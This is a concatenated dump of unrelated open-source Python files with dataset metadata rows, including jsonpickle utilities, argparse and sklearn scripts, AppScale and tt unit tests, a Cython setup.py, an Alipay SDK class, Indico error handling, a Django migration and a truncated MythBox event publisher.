return 'enum' in sys.modules and isinstance(obj, sys.modules['enum'].Enum)
def is_dictionary(obj):
"""Helper method for testing if the object is a dictionary.
>>> is_dictionary({'key':'value'})
True
"""
return type(obj) is dict
def is_sequence(obj):
"""Helper method to see if the object is a sequence (list, set, or tuple).
>>> is_sequence([4])
True
"""
return type(obj) in SEQUENCES_SET
def is_list(obj):
"""Helper method to see if the object is a Python list.
>>> is_list([4])
True
"""
return type(obj) is list
def is_set(obj):
"""Helper method to see if the object is a Python set.
>>> is_set(set())
True
"""
return type(obj) is set
def is_bytes(obj):
"""Helper method to see if the object is a bytestring.
>>> is_bytes(b'foo')
True
"""
return type(obj) is bytes
def is_unicode(obj):
"""Helper method to see if the object is a unicode string"""
return type(obj) is compat.ustr
def is_tuple(obj):
"""Helper method to see if the object is a Python tuple.
>>> is_tuple((1,))
True
"""
return type(obj) is tuple
def is_dictionary_subclass(obj):
"""Returns True if *obj* is a subclass of the dict type. *obj* must be
a subclass and not the actual builtin dict.
>>> class Temp(dict): pass
>>> is_dictionary_subclass(Temp())
True
"""
# TODO: add UserDict
return (
hasattr(obj, '__class__')
and issubclass(obj.__class__, dict)
and type(obj) is not dict
)
def is_sequence_subclass(obj):
"""Returns True if *obj* is a subclass of list, set or tuple.
*obj* must be a subclass and not the actual builtin, such
as list, set, tuple, etc..
>>> class Temp(list): pass
>>> is_sequence_subclass(Temp())
True
"""
return (
hasattr(obj, '__class__')
and (issubclass(obj.__class__, SEQUENCES) or is_list_like(obj))
and not is_sequence(obj)
)
def is_noncomplex(obj):
"""Returns True if *obj* is a special (weird) class, that is more complex
than primitive data types, but is not a full object. Including:
* :class:`~time.struct_time`
"""
if type(obj) is time.struct_time:
return True
return False
def is_function(obj):
"""Returns true if passed a function
>>> is_function(lambda x: 1)
True
>>> is_function(locals)
True
>>> def method(): pass
>>> is_function(method)
True
>>> is_function(1)
False
"""
function_types = {
types.FunctionType,
types.MethodType,
types.LambdaType,
types.BuiltinFunctionType,
types.BuiltinMethodType,
}
return type(obj) in function_types
def is_module_function(obj):
"""Return True if `obj` is a module-global function
>>> import os
>>> is_module_function(os.path.exists)
True
>>> is_module_function(lambda: None)
False
"""
return (
hasattr(obj, '__class__')
and isinstance(obj, (types.FunctionType, types.BuiltinFunctionType))
and hasattr(obj, '__module__')
and hasattr(obj, '__name__')
and obj.__name__ != '<lambda>'
)
def is_module(obj):
"""Returns True if passed a module
>>> import os
>>> is_module(os)
True
"""
return isinstance(obj, types.ModuleType)
def is_picklable(name, value):
"""Return True if an object can be pickled
>>> import os
>>> is_picklable('os', os)
True
>>> def foo(): pass
>>> is_picklable('foo', foo)
True
>>> is_picklable('foo', lambda: None)
False
"""
if name in tags.RESERVED:
return False
return is_module_function(value) or not is_function(value)
def is_installed(module):
"""Tests to see if ``module`` is available on the sys.path
>>> is_installed('sys')
True
>>> is_installed('hopefullythisisnotarealmodule')
False
"""
try:
__import__(module)
return True
except ImportError:
return False
def is_list_like(obj):
return hasattr(obj, '__getitem__') and hasattr(obj, 'append')
def is_iterator(obj):
is_file = PY2 and isinstance(obj, __builtin__.file)
return (
isinstance(obj, abc_iterator) and not isinstance(obj, io.IOBase) and not is_file
)
def is_collections(obj):
try:
return type(obj).__module__ == 'collections'
except Exception:
return False
def is_reducible_sequence_subclass(obj):
return hasattr(obj, '__class__') and issubclass(obj.__class__, SEQUENCES)
def is_reducible(obj):
"""
Returns false if of a type which have special casing,
and should not have their __reduce__ methods used
"""
# defaultdicts may contain functions which we cannot serialise
if is_collections(obj) and not isinstance(obj, collections.defaultdict):
return True
# sets are slightly slower in this case
if type(obj) in NON_REDUCIBLE_TYPES:
return False
elif obj is object:
return False
elif is_list_like(obj):
return False
elif isinstance(obj, types.ModuleType):
return False
elif is_dictionary_subclass(obj):
return False
elif is_reducible_sequence_subclass(obj):
return False
elif isinstance(getattr(obj, '__slots__', None), iterator_types):
return False
elif is_type(obj) and obj.__module__ == 'datetime':
return False
return True
def in_dict(obj, key, default=False):
"""
Returns true if key exists in obj.__dict__; false if not in.
If obj.__dict__ is absent, return default
"""
return (key in obj.__dict__) if getattr(obj, '__dict__', None) else default
def in_slots(obj, key, default=False):
"""
Returns true if key exists in obj.__slots__; false if not in.
If obj.__slots__ is absent, return default
"""
return (key in obj.__slots__) if getattr(obj, '__slots__', None) else default
def has_reduce(obj):
"""
Tests if __reduce__ or __reduce_ex__ exists in the object dict or
in the class dicts of every class in the MRO *except object*.
Returns a tuple of booleans (has_reduce, has_reduce_ex)
"""
if not is_reducible(obj) or is_type(obj):
return (False, False)
# in this case, reduce works and is desired
# notwithstanding depending on default object
# reduce
if is_noncomplex(obj):
return (False, True)
has_reduce = False
has_reduce_ex = False
REDUCE = '__reduce__'
REDUCE_EX = '__reduce_ex__'
# For object instance
has_reduce = in_dict(obj, REDUCE) or in_slots(obj, REDUCE)
has_reduce_ex = in_dict(obj, REDUCE_EX) or in_slots(obj, REDUCE_EX)
# turn to the MRO
for base in type(obj).__mro__:
if is_reducible(base):
has_reduce = has_reduce or in_dict(base, REDUCE)
has_reduce_ex = has_reduce_ex or in_dict(base, REDUCE_EX)
if has_reduce and has_reduce_ex:
return (has_reduce, has_reduce_ex)
# for things that don't have a proper dict but can be
# getattred (rare, but includes some builtins)
cls = type(obj)
object_reduce = getattr(object, REDUCE)
object_reduce_ex = getattr(object, REDUCE_EX)
if not has_reduce:
has_reduce_cls = getattr(cls, REDUCE, False)
if has_reduce_cls is not object_reduce:
has_reduce = has_reduce_cls
if not has_reduce_ex:
has_reduce_ex_cls = getattr(cls, REDUCE_EX, False)
if has_reduce_ex_cls is not object_reduce_ex:
has_reduce_ex = has_reduce_ex_cls
return (has_reduce, has_reduce_ex)
def translate_module_name(module):
"""Rename builtin modules to a consistent module name.
Prefer the more modern naming.
This is used so that references to Python's `builtins` module can
be loaded in both Python 2 and 3. We remap to the "__builtin__"
name and unmap it when importing.
Map the Python2 `exceptions` module to `builtins` because
`builtins` is a superset and contains everything that is
available in `exceptions`, which makes the translation simpler.
See untranslate_module_name() for the reverse operation.
"""
lookup = dict(__builtin__='builtins', exceptions='builtins')
return lookup.get(module, module)
def untranslate_module_name(module):
"""Rename module names mention in JSON to names that we can import
This reverses the translation applied by translate_module_name() to
a module name available to the current version of Python.
"""
module = _0_9_6_compat_untranslate(module)
lookup = dict(builtins='__builtin__') if PY2 else {}
return lookup.get(module, module)
def _0_9_6_compat_untranslate(module):
"""Provide compatibility for pickles created with jsonpickle 0.9.6 and
earlier, remapping `exceptions` and `__builtin__` to `builtins`.
"""
lookup = dict(__builtin__='builtins', exceptions='builtins')
return lookup.get(module, module)
def importable_name(cls):
"""
>>> class Example(object):
... pass
>>> ex = Example()
>>> importable_name(ex.__class__) == 'jsonpickle.util.Example'
True
>>> importable_name(type(25)) == 'builtins.int'
True
>>> importable_name(None.__class__) == 'builtins.NoneType'
True
>>> importable_name(False.__class__) == 'builtins.bool'
True
>>> importable_name(AttributeError) == 'builtins.AttributeError'
True
"""
# Use the fully-qualified name if available (Python >= 3.3)
name = getattr(cls, '__qualname__', cls.__name__)
module = translate_module_name(cls.__module__)
return '{}.{}'.format(module, name)
def b64encode(data):
"""
Encode binary data to ascii text in base64. Data must be bytes.
"""
return base64.b64encode(data).decode('ascii')
def b64decode(payload):
"""
Decode payload - must be ascii text.
"""
return base64.b64decode(payload)
def b85encode(data):
"""
Encode binary data to ascii text in base85. Data must be bytes.
"""
if PY2:
raise NotImplementedError("Python 2 can't encode data in base85.")
return base64.b85encode(data).decode('ascii')
def b85decode(payload):
"""
Decode payload - must be ascii text.
"""
if PY2:
raise NotImplementedError("Python 2 can't decode base85-encoded data.")
return base64.b85decode(payload)
def itemgetter(obj, getter=operator.itemgetter(0)):
return compat.ustr(getter(obj))
def items(obj):
"""Iterate over dicts in a deterministic order
Python2 does not guarantee dict ordering, so this function
papers over the difference in behavior. Python3 does guarantee
dict order, without use of OrderedDict, so no sorting is needed there.
"""
if PY3_ORDERED_DICT:
for k, v in obj.items():
yield k, v
else:
for k, v in sorted(obj.items(), key=itemgetter):
yield k, v
| 24.875639 | 88 | 0.658061 | [
"BSD-3-Clause"
] | antoinecollet5/Jsonpickle | jsonpickle/util.py | 14,602 | Python |
import argparse
def train_args():
"""
Retrieves and parses the 3 command line arguments provided by the user when
they run the program from a terminal window. This function uses Python's
argparse module to created and defined these 3 command line arguments. If
the user fails to provide some or all of the 3 arguments, then the default
values are used for the missing arguments.
:return: results: data structure that stores the command line arguments object
"""
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', action='store',
dest='data_dir',
default='flowers',
help='Path the directory of the dataset, should contain sub-directories /train, /test, /valid')
parser.add_argument('--save_dir', action='store',
dest='save_dir',
default='checkpoint.pth',
help='Set directory to save checkpoints')
parser.add_argument('--arch', action='store',
dest='arch',
default='vgg16',
help='Choose architecture. Default: vgg16')
parser.add_argument('--learning_rate', action='store',
dest='learning_rate',
default=0.003,
help='Set the learning rate',
type=float)
parser.add_argument('--hidden_units', action='store',
dest='hidden_units',
default=256,
help='Add the hidden units',
type=int)
parser.add_argument('--epochs', action='store',
dest='epochs',
default=30,
help='Add number of epoch cycles',
type=int)
parser.add_argument('--gpu', action='store_true',
dest='gpu',
help='Activate GPU')
results = parser.parse_args()
return results
| 38.236364 | 119 | 0.523062 | [
"MIT"
] | victoray/ImageClasssifier | train_args.py | 2,103 | Python |
import pandas as pd
import plotly.graph_objects as go
import plotly.express as px
import plotly.figure_factory as ff
import numpy as np
from plotly.subplots import make_subplots
from tqdm import tqdm
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.feature_selection import VarianceThreshold
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
train_df = pd.read_csv("../data/titanic/train.csv")
train = train_df.copy()
family_column = train['SibSp'] + train['Parch']
train['Family'] = family_column
train = train[['Survived', 'Pclass', 'Name', 'Sex', 'Age', 'Family', 'Embarked', 'Fare']]
# Account for missingness
train['Age'] = train['Age'].interpolate()
train['Fare'] = train['Fare'].interpolate()
train.head(5) | 29.027778 | 89 | 0.796172 | [
"MIT"
] | kguarian/Classification-Algorithms | knn/main.py | 1,045 | Python |
import sys
import json
from appscale.common.service_stats import stats_manager
from mock import mock, patch
from tornado.testing import AsyncHTTPTestCase
from appscale.common.unpackaged import APPSCALE_PYTHON_APPSERVER
from appscale.taskqueue import appscale_taskqueue, rest_api, statistics
sys.path.append(APPSCALE_PYTHON_APPSERVER)
class TestServiceStatistics(AsyncHTTPTestCase):
def get_app(self):
""" Overwrites method of AsyncHTTPTestCase.
Returns:
an instance of tornado application
"""
# We mock functionality which uses distributed taskqueue so can omit it
distributed_taskqueue = None
return appscale_taskqueue.prepare_taskqueue_application(
task_queue=distributed_taskqueue
)
def setUp(self):
""" Patches handlers of Taskqueue application in order
to prevent real calls to Cassandra and Datastore because only
service statistics matters for this test.
"""
super(TestServiceStatistics, self).setUp()
# Patch get_status of REST handlers
handlers = [rest_api.RESTQueue, rest_api.RESTTask,
rest_api.RESTLease, rest_api.RESTTasks]
self.patchers = []
self.get_http_status_mock = mock.MagicMock()
for handler in handlers:
patcher = patch.object(handler, 'get_status', self.get_http_status_mock)
patcher.start()
self.patchers.append(patcher)
# Patch all http methods as they are not an object of test
for method in ['get', 'post', 'put', 'delete', 'patch']:
def method_impl(*args, **kwargs):
return None
patcher = patch.object(handler, method, method_impl)
patcher.start()
self.patchers.append(patcher)
# Patch remote_request method of protobuffer handler
remote_request_patcher = patch.object(
appscale_taskqueue.ProtobufferHandler, 'remote_request'
)
self.pb_remote_request_mock = remote_request_patcher.start()
self.patchers.append(remote_request_patcher)
time_patcher = patch.object(stats_manager.time, 'time')
self.time_mock = time_patcher.start()
self.patchers.append(time_patcher)
def tearDown(self):
super(TestServiceStatistics, self).tearDown()
# Stops all patchers.
for patcher in self.patchers:
patcher.stop()
reload(statistics)
reload(rest_api)
reload(appscale_taskqueue)
def test_stats(self):
self.time_mock.return_value = 1000
# Specify stub information for protobuffer requests
pb_headers = {
'protocolbuffertype': 'Request',
'appdata': 'test-app',
'Version': 'test-version',
'Module': 'test-module'
}
pb_body = "does not matter"
# Do 6 protobuffer requests:
# Mock remote_request method to return tuple (pb_method, pb_status)
self.pb_remote_request_mock.return_value = 'BulkAdd', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'BulkAdd', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'FetchTask', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'PauseQueue', 'UNKNOWN_QUEUE'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'PauseQueue', 'OK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
self.pb_remote_request_mock.return_value = 'FetchTask', 'UNKNOWN_TASK'
self.fetch('/queues', method='POST', body=pb_body, headers=pb_headers)
# Do 9 REST requests:
# Mock get_status method of REST handlers to return wanted http status
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/queue1'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/queue1'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/queue1/tasks'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks'
self.fetch(path, method='POST', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks'
self.fetch(path, method='POST', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 200
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks/task1'
self.fetch(path, method='GET')
self.get_http_status_mock.return_value = 500
path = '/taskqueue/v1beta2/projects/app1/taskqueues/qeueu1/tasks/task1'
self.fetch(path, method='DELETE', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 404
path = '/taskqueue/v1beta2/projects/app1/taskqueues/unknown/tasks/task1'
self.fetch(path, method='PATCH', allow_nonstandard_methods=True)
self.get_http_status_mock.return_value = 404
path = '/taskqueue/v1beta2/projects/unknown/taskqueues/qeueu1/tasks/task1'
self.fetch(path, method='GET')
# Fetch statistics
raw_stats = self.fetch('/service-stats').body
stats = json.loads(raw_stats)
# Pop and check time-related fields
self.assertGreater(stats['cumulative_counters'].pop('from'), 0)
self.assertGreater(stats['cumulative_counters'].pop('to'), 0)
self.assertGreater(stats['recent_stats'].pop('from'), 0)
self.assertGreater(stats['recent_stats'].pop('to'), 0)
self.assertGreaterEqual(stats['recent_stats'].pop('avg_latency'), 0)
# Verify other fields
self.assertEqual(stats, {
'current_requests': 0,
'cumulative_counters': {
'all': 15,
'failed': 5,
'pb_reqs': 6,
'rest_reqs': 9
},
'recent_stats': {
'all': 15,
'failed': 5,
'pb_reqs': 6,
'rest_reqs': 9,
'by_rest_method': {
'get_task': 2,
'get_tasks': 1,
'delete_task': 1,
'get_queue': 2,
'patch_task': 1,
'post_tasks': 2
},
'by_rest_status': {
'200': 6,
'404': 2,
'500': 1
},
'by_pb_method': {
'BulkAdd': 2,
'PauseQueue': 2,
'FetchTask': 2
},
'by_pb_status': {
'OK': 4,
'UNKNOWN_TASK': 1,
'UNKNOWN_QUEUE': 1
}}})
def test_scroll_stats(self):
self.time_mock.return_value = 1000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 2000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 3000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
# Fetch statistics
self.time_mock.return_value = 99999 # current time doesn't matter
# for scrolling
raw_stats = self.fetch('/service-stats?cursor=1500000').body
stats = json.loads(raw_stats)
self.assertEqual(stats['cumulative_counters']['all'], 3)
self.assertEqual(stats['recent_stats']['all'], 2)
def test_recent_stats(self):
self.time_mock.return_value = 1000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 2000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
self.time_mock.return_value = 3000
self.get_http_status_mock.return_value = 200
self.fetch('/taskqueue/v1beta2/projects/app1/taskqueues/queue1')
# Fetch statistics as if it was in the future
self.time_mock.return_value = 99999 # current time does matter for recent
raw_stats = self.fetch('/service-stats?last_milliseconds=2000000').body
stats = json.loads(raw_stats)
self.assertEqual(stats['cumulative_counters']['all'], 3)
self.assertEqual(stats['recent_stats']['all'], 0) # 0 for last 2 seconds
# Fetch statistics as if it was just after requests
self.time_mock.return_value = 3500 # current time does matter for recent
raw_stats = self.fetch('/service-stats?last_milliseconds=2000000').body
stats = json.loads(raw_stats)
self.assertEqual(stats['cumulative_counters']['all'], 3)
self.assertEqual(stats['recent_stats']['all'], 2) # 2 for last 2 seconds
| 38.424779 | 78 | 0.697835 | [
"Apache-2.0"
] | HafeezRai/appscale | AppTaskQueue/test/unit/test_service_stats.py | 8,684 | Python |
import os
from setuptools import Extension, setup
import sys
from Cython.Build import build_ext
import numpy
NAME = "olive-camera-dcamapi"
VERSION = "0.1"
DESCRIPTION = "A small template project that shows how to wrap C/C++ code into python using Cython"
URL = "https://github.com/liuyenting/olive-camera-dcamapi"
# Trove classifiers
# https://pypi.org/classifiers/
CLASSIFIERS = [
"License :: OSI Approved :: Apache Software License",
"Operating System :: Microsoft :: Windows",
]
KEYWORDS = []
AUTHOR = "Liu, Yen-Ting"
EMAIL = "[email protected]"
REQUIRES = ["numpy", "trio~=0.13.0"]
PACKAGES = ["olive.drivers.dcamapi"]
EXT_DEFS = [
{
"name": "olive.drivers.dcamapi.wrapper",
"language": "c++",
"include_dirs": [
# "Module .pxd file not found next to .pyx file", https://github.com/cython/cython/issues/2452
".",
# numpy
numpy.get_include(),
],
"libraries": ["dcamapi"],
"library_dirs": ["lib"],
}
]
######################################################################################
cwd = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(cwd, "README.md"), encoding="utf-8") as fd:
LONG_DESCRIPTION = fd.read()
# - install cython headers so other modules can cimport
# - force sdist to keep the .pyx files
PACKAGE_DATA = {pkg: ["*.pxd", "*.pyx"] for pkg in PACKAGES}
def generate_extension(ext_def):
"""Generate extension constructors."""
assert "name" in ext_def, "invalid extension name"
ext_path = ext_def["name"].replace(".", os.path.sep) + ".pyx"
ext_root = os.path.dirname(ext_path)
ext_def["sources"] = [ext_path]
if "extra_objects" in ext_def:
if not sys.platform.startswith("linux"):
# NOTE:
# re-route static library on Windows https://stackoverflow.com/a/49139257
# extract names
static_libs = [os.path.split(lib) for lib in ext_def["extra_objects"]]
lib_dirs, lib_names = zip(*static_libs)
lib_names = [os.path.splitext(name)[0] for name in lib_names]
# 1) save it into 'libraries'
# 2) append search path (remove duplicates on-the-fly)
ext_def.setdefault("libraries", []).extend(lib_names)
ext_def.setdefault("library_dirs", []).extend(list(set(lib_dirs)))
# empty 'extra_objects'
del ext_def["extra_objects"]
# prepend root directory
arguments = (
"include_dirs",
"library_dirs",
"runtime_library_dirs",
"extra_objects",
)
for argument in arguments:
try:
ext_def[argument] = [
os.path.join(ext_root, path) for path in ext_def[argument]
]
except KeyError:
# ignore unused argument
pass
return Extension(**ext_def)
EXTENSIONS = [generate_extension(ext_def) for ext_def in EXT_DEFS]
setup(
#
# Project Info
#
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url=URL,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
#
# Author
#
author=AUTHOR,
author_email=EMAIL,
#
# Dependencies
#
# use pyproject.toml for setup dependencies instead
# setup_requires=[],remove
install_requires=REQUIRES,
#
# Package Structure
#
# package to install
packages=PACKAGES,
package_data=PACKAGE_DATA,
#
# Build Instruction
#
cmdclass={"build_ext": build_ext},
ext_modules=EXTENSIONS,
# disable zip_safe
# - Cython cannot find .pxd files inside installed .egg
# - dynmaic loader may require library unzipped to a temporary directory at import time
zip_safe=False,
)
| 28.820144 | 107 | 0.590864 | [
"Apache-2.0"
] | liuyenting/olive-camera-dcamapi | setup.py | 4,006 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AntMerchantExpandBenefitConfirmResponse(AlipayResponse):
def __init__(self):
super(AntMerchantExpandBenefitConfirmResponse, self).__init__()
self._benefit_instance_id = None
self._detail_msg = None
self._error_code = None
self._grant_sn = None
self._record_id = None
self._result = None
@property
def benefit_instance_id(self):
return self._benefit_instance_id
@benefit_instance_id.setter
def benefit_instance_id(self, value):
self._benefit_instance_id = value
@property
def detail_msg(self):
return self._detail_msg
@detail_msg.setter
def detail_msg(self, value):
self._detail_msg = value
@property
def error_code(self):
return self._error_code
@error_code.setter
def error_code(self, value):
self._error_code = value
@property
def grant_sn(self):
return self._grant_sn
@grant_sn.setter
def grant_sn(self, value):
self._grant_sn = value
@property
def record_id(self):
return self._record_id
@record_id.setter
def record_id(self, value):
self._record_id = value
@property
def result(self):
return self._result
@result.setter
def result(self, value):
self._result = value
def parse_response_content(self, response_content):
response = super(AntMerchantExpandBenefitConfirmResponse, self).parse_response_content(response_content)
if 'benefit_instance_id' in response:
self.benefit_instance_id = response['benefit_instance_id']
if 'detail_msg' in response:
self.detail_msg = response['detail_msg']
if 'error_code' in response:
self.error_code = response['error_code']
if 'grant_sn' in response:
self.grant_sn = response['grant_sn']
if 'record_id' in response:
self.record_id = response['record_id']
if 'result' in response:
self.result = response['result']
| 28.868421 | 112 | 0.662261 | [
"Apache-2.0"
] | articuly/alipay-sdk-python-all | alipay/aop/api/response/AntMerchantExpandBenefitConfirmResponse.py | 2,194 | Python |
# This file is part of Indico.
# Copyright (C) 2002 - 2019 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from __future__ import absolute_import, unicode_literals
import traceback
from uuid import uuid4
from flask import g, jsonify, render_template, request, session
from itsdangerous import BadData
from sqlalchemy.exc import OperationalError
from werkzeug.exceptions import Forbidden, HTTPException
from indico.core.errors import NoReportError
from indico.legacy.common.cache import GenericCache
from indico.web.util import get_request_info
from indico.web.views import WPError
def render_error(exc, title, message, code, standalone=False):
_save_error(exc, title, message)
if _need_json_response():
return _jsonify_error(exc, title, message, code)
elif standalone:
return render_template('standalone_error.html', error_message=title, error_description=message), code
else:
try:
return WPError(title, message).getHTML(), code
except OperationalError:
# If the error was caused while connecting the database,
# rendering the error page fails since e.g. the header/footer
# templates access the database or calls hooks doing so.
# In this case we simply fall-back to the standalone error
# page which does not show the indico UI around the error
# message but doesn't require any kind of DB connection.
return render_error(exc, title, message, code, standalone=True)
def load_error_data(uuid):
return GenericCache('errors').get(uuid)
def _save_error(exc, title, message):
# Note that `exc` is only used to check if the error should be saved.
# Any other information is taken from `sys.exc_info()`!
if 'saved_error_uuid' in g:
return
if not _is_error_reportable(exc):
return
g.saved_error_uuid = uuid = unicode(uuid4())
# XXX: keep this outside - it must be called before `get_request_info()`
# as that function may mess up `sys.exc_info()` in case accessing user
# details fails
tb = traceback.format_exc()
data = {'title': title,
'message': message,
'request_info': get_request_info(),
'traceback': tb,
'sentry_event_id': g.get('sentry_event_id')}
GenericCache('errors').set(uuid, data, 7200)
def _need_json_response():
return request.is_xhr or request.is_json
def _is_error_reportable(exc):
# error marked as not reportable
if isinstance(exc, NoReportError) or getattr(exc, '_disallow_report', False):
return False
elif isinstance(exc, BadData):
# itsdangerous stuff - should only fail if someone tampers with a link
return False
elif isinstance(exc, Forbidden):
# forbidden errors for guests are not reportable
# for other users: same logic as any other http exception
return _need_json_response() and session.user is not None
elif isinstance(exc, HTTPException):
# http exceptions can only be reported if they occur during
# an AJAX request - otherwise they are typically caused by
# users doing something wrong (typing a 404 URL, messing with
# data, etc)
return _need_json_response()
else:
return True
def _jsonify_error(exc, title, message, code):
error_data = {
'title': title,
'message': message,
'error_uuid': g.get('saved_error_uuid') if _is_error_reportable(exc) else None,
}
response = jsonify(error=error_data)
response.status_code = code
return response
| 36.792079 | 109 | 0.694564 | [
"MIT"
] | fweng322/indico | indico/web/errors.py | 3,716 | Python |
"""Tests for iterating over expression clauses.
Since BooleanExpressions's iter_clauses variations are basically wrappers
around the functions of the same name from ExpressionTreeNode, they are not
tested in-depth here. Instead, take a look at the unit tests for
ExpressionTreeNode's implementation.
"""
import unittest
from tt.expressions import BooleanExpression
class TestExpressionIterClauses(unittest.TestCase):
def test_simple_iter_clauses(self):
"""Test basic expression iter_clauses functionality."""
# ensure defaults to CNF
b = BooleanExpression('A or B or C or D')
self.assertTrue(b.is_cnf)
self.assertTrue(b.is_dnf)
clauses = b.iter_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A or B or C or D">')
with self.assertRaises(StopIteration):
next(clauses)
# ensure falls back to DNF
b = BooleanExpression('(A and B and C) or (D and E and F)')
self.assertFalse(b.is_cnf)
self.assertTrue(b.is_dnf)
clauses = b.iter_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A and B and C">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "D and E and F">')
with self.assertRaises(StopIteration):
next(clauses)
def test_simple_iter_cnf(self):
"""Test basic expression iter_cnf_clauses functionality."""
b = BooleanExpression('(A or B) and (C or D) and (E or F)')
self.assertTrue(b.is_cnf)
self.assertFalse(b.is_dnf)
clauses = b.iter_cnf_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A or B">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "C or D">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "E or F">')
with self.assertRaises(StopIteration):
next(clauses)
def test_simple_iter_dnf(self):
"""Test basic expression iter_dnf_clauses functionality."""
b = BooleanExpression('(A and B) or (C and D) or (E and F)')
self.assertTrue(b.is_dnf)
self.assertFalse(b.is_cnf)
clauses = b.iter_dnf_clauses()
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "A and B">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "C and D">')
self.assertEqual(
repr(next(clauses)),
'<BooleanExpression "E and F">')
with self.assertRaises(StopIteration):
next(clauses)
| 32.951807 | 75 | 0.609141 | [
"MIT"
] | fkromer/tt | tt/tests/unit/expressions/test_bexpr_iter_clauses.py | 2,735 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-03-01 09:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0018_project_properties'),
]
operations = [
migrations.AlterModelOptions(
name='product',
options={'ordering': ['-id'], 'permissions': (('view_product', 'View product'),)},
),
migrations.AlterModelOptions(
name='productstatus',
options={'ordering': ['-id'], 'permissions': (('view_productstatus', 'View product status'),)},
),
migrations.AlterModelOptions(
name='project',
options={'ordering': ['-identifier'], 'permissions': (('view_project', 'View project'),)},
),
migrations.AlterModelOptions(
name='projectstatus',
options={'ordering': ['-id'], 'permissions': (('view_projectstatus', 'View project status'),)},
),
]
| 32.03125 | 107 | 0.580488 | [
"MIT"
] | GETLIMS/LIMS-Backend | lims/projects/migrations/0019_auto_20180301_0958.py | 1,025 | Python |
#
# MythBox for XBMC - http://mythbox.googlecode.com
# Copyright (C) 2011 [email protected]
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import logging
import xbmc
from mythbox.bus import Event
from mythbox.util import run_async
from mythbox.mythtv.conn import EventConnection, inject_conn
log = logging.getLogger('mythbox.core')
class MythEventPublisher(object):
# Before recording starts:
#
# [u'BACKEND_MESSAGE', u'SYSTEM_EVENT REC_PENDING SECS 120 CARDID 7 CHANID 4282 STARTTIME 2011-05-27T20:00:00 SENDER athena', u'empty']
#
# Delete recording
#
# [u'BACKEND_MESSAGE', u'RECORDING_LIST_CHANGE DELETE 1071 2011-05-27T15:30:00', u'empty']
#
# Create/edit/delete schedule
#
# [u'BACKEND_MESSAGE', u'SCHEDULE_CHANGE', u'empty']
#
def __init__(self, *args, **kwargs):
[setattr(self, k, v) for k,v in kwargs.items() if k in ['bus', 'settings','translator','platform']]
self.closed = False
@inject_conn
def supportsSystemEvents(self):
return self.conn().platform.supportsSystemEvents()
@run_async
def startup(self):
log.debug('Starting MythEventPublisher..')
self.eventConn = EventConnection(settings=self.settings, translator=self.translator, platform=self.platform, bus=self.bus)
while not self.closed and not xbmc.abortRequested:
try:
tokens = self.eventConn.readEvent()
if len(tokens) >= 2 and not tokens[1].startswith(u'UPDATE_FILE_SIZE'):
log.debug('EVENT: %s' % tokens)
